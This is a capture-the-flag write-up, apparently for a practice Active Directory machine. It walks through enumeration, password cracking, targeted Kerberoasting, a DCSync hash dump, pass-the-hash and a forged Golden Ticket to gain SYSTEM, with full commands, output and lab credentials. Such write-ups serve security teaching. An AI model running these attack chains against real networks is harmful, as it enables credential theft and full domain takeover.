Microsoft Windows Server 2016 or Server 2019 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2016 (93%)NoexactOSmatchesforhost (test conditionsnon-ideal).TCP/IPfingerprint:SCAN(V=7.95%E=4%D=1/21%OT=21%CT=%CU=30024%PV=Y%DS=2%DC=T%G=N%TM=678FCCFA%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)Uptimeguess:0.274days (since TueJan2105:02:052025)NetworkDistance:2hopsTCPSequencePrediction:Difficulty=264 (Good luck!)IPIDSequenceGeneration:IncrementalServiceInfo:Host:DC;OS:Windows;CPE:cpe:/o:microsoft:windowsHostscriptresults:|p2p-conficker:|CheckingforConficker.Corhigher...|Check1 (port 35406/tcp): CLEAN (Couldn't connect)| Check 2 (port 20522/tcp): CLEAN (Couldn'tconnect)|Check3 (port 52617/udp): CLEAN (Failedtoreceivedata)|Check4 (port 52572/udp): CLEAN (Timeout)|_0/4checksarepositive:HostisCLEANorportsareblocked|_clock-skew:6h59m59s|smb2-security-mode:|3:1:1:|_Messagesigningenabledandrequired|smb2-time:|date:2025-01-21T23:35:55|_start_date:N/ATRACEROUTE (using port445/tcp)HOPRTTADDRESS1281.14ms10.10.14.12301.15ms10.10.11.42Nmapdone:1IPaddress (1 hostup) scanned in 93.79 secondsRawpacketssent:85 (6.902KB) |Rcvd:92 (6.282KB)
We can see the hostname of DC in the output so let’s add it into the hosts file:
I started by looking at our environment and evaluating the attack surface:
croc@hacker$sudo/usr/bin/ldapdomaindumpldap://10.10.11.42-u'ADMINISTRATOR\Olivia'-p'ichliebedich'[*] Connecting to host...[*] Binding to host[+] Bind OK[*] Starting domain dump[+] Domain dump finishedcroc@hacker$lsdomain_computers_by_os.htmldomain_groups.grepdomain_policy.htmldomain_trusts.jsondomain_users.jsondomain_computers.grepdomain_groups.htmldomain_policy.jsondomain_users_by_group.htmldomain_computers.htmldomain_groups.jsondomain_trusts.grepdomain_users.grepdomain_computers.jsondomain_policy.grepdomain_trusts.htmldomain_users.htmlcroc@hacker$firefoxdomain_users_by_group.html
This gave me a clear understanding of all the users and groups on the target. I have the habit of creating a users.txt file that comes very handy afterwards when password spraying.
I found out that olivia, who we currently own, is the part of Remote Management Users.
As port 5985/tcp is open, we can get evil-winrm shell access as olivia & see what we can do from there.
Evil-WinRM
I got the WinRM access but didn’t find anything juicy here!
I enumerated the available shares using the given credentials. The credentials are valid however, we are certainly not going to have access to the privileged shares like Admin$ or C$ as a low-level user.
croc@hacker$sudonxcsmb10.10.11.42-u'Olivia'-p'ichliebedich'--sharesSMB10.10.11.42445DC [*] Windows Server 2022 Build 20348 x64 (name:DC)(domain:administrator.htb)(signing:True)(SMBv1:False)SMB10.10.11.42445DC [+] administrator.htb\Olivia:ichliebedichSMB10.10.11.42445DC [*] Enumerated sharesSMB10.10.11.42445DCSharePermissionsRemarkSMB10.10.11.42445DC----------------------SMB10.10.11.42445DCADMIN$ RemoteAdminSMB10.10.11.42445DCC$ DefaultshareSMB10.10.11.42445DCIPC$ READRemoteIPCSMB10.10.11.42445DCNETLOGONREADLogonservershareSMB10.10.11.42445DCSYSVOLREADLogonservershare
FTP – 21/tcp
The credentials Olivia:ichliebedich doesn’t appear to be valid for the FTP Service:
Anonymous access is also not permitted:
💡 Think Box
In order to find a way in, I shifted my focus to enumerating potential pathways using BloodHound graphs.
BloodHound – 389/tcp
I dumped the .json configuration files using Python BloodHound Ingestor & uploaded the data in bloodhound.
I marked olivia as owned & found out that it has GenericAll permissions over michael. That means full control! This privilege allows the trustee to manipulate the target object however they wish.
Shell as Michael
Changing the Password of Michael
As olivia has full control over michael, she must be able to change his password. I used bloodyAD to do that:
This file is a Password Safe database file which is a popular open-source password manager. Through enumeration, I found out that these type of files are protected by a master password.
In order to view the passwords stored in this database file, we need its master password. Luckily, there is a JTR utility called pwsafe2john which we can utilize to convert this database file into crackable hashes allowing us to attempt password cracking using john.
croc@hacker$pwsafe2johnBackup.psafe3>backup.hashescroc@hacker$lsbackup.hashesBackup.psafe3croc@hacker$johnbackup.hashes--wordlist=/usr/share/wordlists/rockyou.txtUsingdefaultinputencoding:UTF-8Loaded1passwordhash (pwsafe, PasswordSafe [SHA256 128/128AVX4x])Cost1 (iteration count) is 2048 for all loaded hashesWillrun3OpenMPthreadsPress'q'orCtrl-Ctoabort,almostanyotherkeyforstatustekieromucho (Backu) 1g0:00:00:02DONE (2025-01-21 15:23) 0.4975g/s 3056p/s 3056c/s 3056C/s Liverpool..iheartyouUsethe"--show"optiontodisplayallofthecrackedpasswordsreliablySessioncompleted.
Hurrah!! The master password has been successfully cracked!
As we have compromised a bunch of other users, we must return to the bloodhound graphs and see what we can do. I found out that emilyhas GenericWrite permissions over ethan:
💡 Think Box
We have three potential attack vectors: Shadow Credentials, Forced Password Reset, and Targeted Kerberoasting. The first two options were unsuccessful so we are going with targeted kerberoasting.
Targeted Kerberoasting
As an attacker, what we do is add a SPN to the target account. Once an account has a SPN, it becomes vulnerable to kerberoasting attack. You can read more about it here.
We will be using the following script in order to perform this attack:
So, the password for ethan is limpbizkit. Congratulations, we owned another user!
Revisiting BloodHound
The user ethan has the following privileges on the domai:
DS-Replication-Get-Changes
DS-Replication-Get-Changes-In-Filtered-Set
DS-Replication-Get-Changes-All
These privileges allows ethan to perform a DCSyncattack.
DCSync Attack
In this attack, an attacker simulates the behavior of a domain controller and retrieve password data or NTDS.dit via Domain Replication. Watch this video or read this for a better understanding.
I used secretsdump to perform the DCSync attack and dumped the NTDS.dit:
croc@hacker$impacket-secretsdumpadministrator.htb/'ethan':'limpbizkit'@10.10.11.42Impacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2Administrator:des-cbc-md5:403286f7cdf18385krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94krbtgt:des-cbc-md5:2c0bc7d0250dbfc7administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9administrator.htb\michael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959administrator.htb\michael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8badministrator.htb\michael:des-cbc-md5:43c2bc231598012aadministrator.htb\benjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847fadministrator.htb\benjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645eadministrator.htb\benjamin:des-cbc-md5:b6f84a864376a4adadministrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270fadministrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49fadministrator.htb\ethan:des-cbc-md5:58387aef9d6754fbadministrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeadeadministrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bfadministrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5eadministrator.htb\emma:des-cbc-md5:3249fba89813ef5dDC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccbDC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206dDC$:des-cbc-md5:f483547c4325492a[*] Cleaning up...
Domain Admin
Finally, we can leverage a Pass-the-Hash (PtH) attack to authenticate as the Domain Administrator on the domain controller.
croc@hacker$sudoevil-winrm-i10.10.11.42-u'administrator'-H'3dc553ce4b9fd20bd016e098d2d2fd2e'[sudo] password for croc: Evil-WinRMshellv3.7Warning:Remotepathcompletionsisdisabledduetorubylimitation:quoting_detection_proc()functionisunimplementedonthismachineData:Formoreinformation,checkEvil-WinRMGitHub:https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo:Establishingconnectiontoremoteendpoint*Evil-WinRM* PS C:\Users\Administrator\Documents>
I wanted to delve deeper into the box by exploring some persistence techniques. I decided to give the Golden Ticket a shot! That’s when my friend/mentor, 0xCOFFEE, came to my rescue. The following note from him really helped me achieve this.
Further, I used the impacket-ticketer to generate the ticket:
croc@hacker:~$impacket-ticketer-aesKey'aadb89e07c87bcaf9c540940fab4af94'-domain-sid'S-1-5-21-1088858960-373806567-254189436'-domain'administrator.htb'-dc-ip'10.10.11.42'-user-id'500''Administrator'Impacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Creating basic skeleton ticket and PAC Infos[*] Customizing ticket for administrator.htb/Administrator[*] PAC_LOGON_INFO[*] PAC_CLIENT_INFO_TYPE[*] EncTicketPart[*] EncAsRepPart[*] Signing/Encrypting final ticket[*] PAC_SERVER_CHECKSUM[*] PAC_PRIVSVR_CHECKSUM[*] EncTicketPart[*] EncASRepPart[*] Saving ticket in Administrator.ccache
Here,
-aesKey
Specifies the AES Key for the krbtgt account
-domain-sid
Specifies the Domain SID
-user-id
Specifies the Administrator RID
Step#3: Test Out!
While specifying the KRB5CCNAME environment variable equal to the ticket we just generated, I used psexec to get remote access as the administrator user and it worked flawlessly!
croc@hacker:~$KRB5CCNAME=Administrator.ccachefaketime"$(ntpdate -q dc.administrator.htb |cut -d '' -f 1,2)"impacket-psexec-k-no-pass-dc-ip10.10.11.42'administrator.htb/administrator@DC.administrator.htb'Impacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Requesting shares on DC.administrator.htb.....[*] Found writable share ADMIN$[*] Uploading file YwxhjLVC.exe[*] Opening SVCManager on DC.administrator.htb.....[*] Creating service oZXF on DC.administrator.htb.....[*] Starting service oZXF.....[!] Press help for extra shell commandsMicrosoftWindows [Version 10.0.20348.2762](c) Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamintauthority\system
